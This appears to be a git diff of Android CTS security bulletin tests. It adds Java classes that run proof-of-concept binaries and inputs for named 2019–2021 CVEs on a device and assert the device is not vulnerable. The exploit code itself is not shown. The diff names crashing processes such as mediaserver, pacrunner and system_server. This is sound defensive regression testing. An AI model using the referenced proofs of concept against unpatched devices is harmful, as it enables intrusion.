+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2019 extends SecurityTestCase {
+
+ /**
+ * b/115635871
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ @Test
+ public void testPocCVE_2019_2019() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2019", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
new file mode 100644
index 0000000..0ac90e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2035.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2035 extends SecurityTestCase {
+
+ /**
+ * b/122320256
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2035() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2035", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
new file mode 100644
index 0000000..2619ed9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2040.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2040 extends SecurityTestCase {
+
+ /**
+ * b/122316913
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2040() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2040", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
new file mode 100644
index 0000000..6072d12
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2044 extends SecurityTestCase {
+
+ /**
+ * b/123701862
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-05")
+ @Test
+ public void testPocCVE_2019_2044() throws Exception {
+ pocPusher.only32();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2044", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
new file mode 100644
index 0000000..e20bb5c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2099 extends SecurityTestCase {
+
+ /**
+ * b/123583388
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ **/
+ @SecurityTest(minPatchLevel = "2019-06")
+ @Test
+ public void testPocCVE_2019_2099() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2099", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
index db98e28..6833243 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
@@ -33,6 +33,7 @@
@SecurityTest(minPatchLevel = "2019-08")
@Test
public void testPocCVE_2019_2135() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
pocPusher.only64();
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice());
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
new file mode 100644
index 0000000..20396ac
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2206 extends SecurityTestCase {
+
+ /**
+ * b/139188579
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ @Test
+ public void testPocCVE_2019_2206() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2206", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
new file mode 100644
index 0000000..6f4340c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2207 extends SecurityTestCase {
+
+ /**
+ * b/124524315
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ @Test
+ public void testPocCVE_2019_2207() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2207", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
new file mode 100644
index 0000000..efd1e54
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0006 extends SecurityTestCase {
+
+ /**
+ * b/139738828
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-01")
+ @Test
+ public void testPocCVE_2020_0006() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0006", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
index 4e0a4a6..e624134 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
@@ -32,6 +32,7 @@
@SecurityTest(minPatchLevel = "2020-03")
@Test
public void testPocCVE_2020_0037() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
pocPusher.only64();
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice());
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
index 6759c30..5731c12 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
@@ -32,6 +32,7 @@
@SecurityTest(minPatchLevel = "2020-03")
@Test
public void testPocCVE_2020_0038() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
pocPusher.only64();
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice());
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
index f0f3323..7d5ae37 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
@@ -32,6 +32,7 @@
@SecurityTest(minPatchLevel = "2020-03")
@Test
public void testPocCVE_2020_0039() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
pocPusher.only64();
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice());
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
new file mode 100644
index 0000000..79826e7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.compatibility.common.util.CrashUtils;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0073 extends SecurityTestCase {
+
+ /**
+ * b/147309942
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2020-04")
+ @Test
+ public void testPocCVE_2020_0073() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ String binaryName = "CVE-2020-0073";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java
new file mode 100644
index 0000000..b02eeea
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import java.util.Arrays;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0224 extends SecurityTestCase {
+
+ /**
+ * b/147664838
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-07")
+ @Test
+ public void testPocCVE_2020_0224() throws Exception {
+ String inputFiles[] = {"cve_2020_0224.pac"};
+ String binaryName = "CVE-2020-0224";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ testConfig.config.checkMinAddress(false);
+ testConfig.arguments = AdbUtils.TMP_PATH + inputFiles[0];
+ testConfig.inputFiles = Arrays.asList(inputFiles);
+ testConfig.inputFilesDestination = AdbUtils.TMP_PATH;
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
new file mode 100644
index 0000000..4c2b91d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0243 extends SecurityTestCase {
+
+ /**
+ * b/151644303
+ * Vulnerability Behaviour: SIGSEGV in mediaserver
+ */
+ @SecurityTest(minPatchLevel = "2020-08")
+ @Test
+ public void testPocCVE_2020_0243() throws Exception {
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2020-0243", getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns("mediaserver");
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
new file mode 100644
index 0000000..2e1ca03
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
@@ -0,0 +1,42 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import static org.junit.Assume.assumeFalse;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0383 extends SecurityTestCase {
+
+ /**
+ * b/150160279
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0383() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0383.xmf", "cve_2020_0383.info"};
+ String binaryName = "CVE-2020-0383";
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(binaryName,
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
new file mode 100644
index 0000000..dd2aff8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AppModeInstant;
+import android.platform.test.annotations.AppModeFull;
+import android.util.Log;
+import android.platform.test.annotations.SecurityTest;
+
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+
+import org.junit.After;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+/**
+ * Test that collects test results from test package android.security.cts.CVE_2021_0305.
+ *
+ * When this test builds, it also builds a support APK containing
+ * {@link android.sample.cts.CVE_2021_0305.SampleDeviceTest}, the results of which are
+ * collected from the hostside and reported accordingly.
+ */
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0305 extends BaseHostJUnit4Test {
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_0305";
+ private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ private static final String TEST_APP = "CVE-2021-0305.apk";
+
+ @Before
+ public void setUp() throws Exception {
+ uninstallPackage(getDevice(), TEST_PKG);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-09")
+ @AppModeFull
+ public void testRunDeviceTestsPassesFull() throws Exception {
+ installPackage();
+ Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "testClick"));
+ }
+
+ private void installPackage() throws Exception {
+ installPackage(TEST_APP, new String[0]);
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java
new file mode 100644
index 0000000..2160aca
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0393 extends SecurityTestCase {
+
+ /**
+ * b/168041375
+ * Vulnerability Behavior: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0393() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runProxyAutoConfig("cve_2021_0393", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
new file mode 100644
index 0000000..3df46a7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.assertTrue;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0396 extends SecurityTestCase {
+
+ /**
+ * b/160610106
+ * Vulnerability Behaviour: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0396() throws Exception {
+ AdbUtils.runProxyAutoConfig("cve_2021_0396", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
new file mode 100644
index 0000000..935b601
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0430 extends SecurityTestCase {
+
+ /**
+ * b/178725766
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0430() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0430", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
new file mode 100644
index 0000000..25802a0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0439 extends SecurityTestCase {
+
+ /**
+ * b/174243830
+ * Vulnerability Behaviour: SIGSEGV in system_server
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0439() throws Exception {
+ String processPatternStrings[] = {"system_server"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0439", null, getDevice(),
+ processPatternStrings);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java b/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
deleted file mode 100644
index d97c4db..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/HostsideOomCatcher.java
+++ /dev/null
@@ -1,228 +0,0 @@
-/*
- * Copyright (C) 2018 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
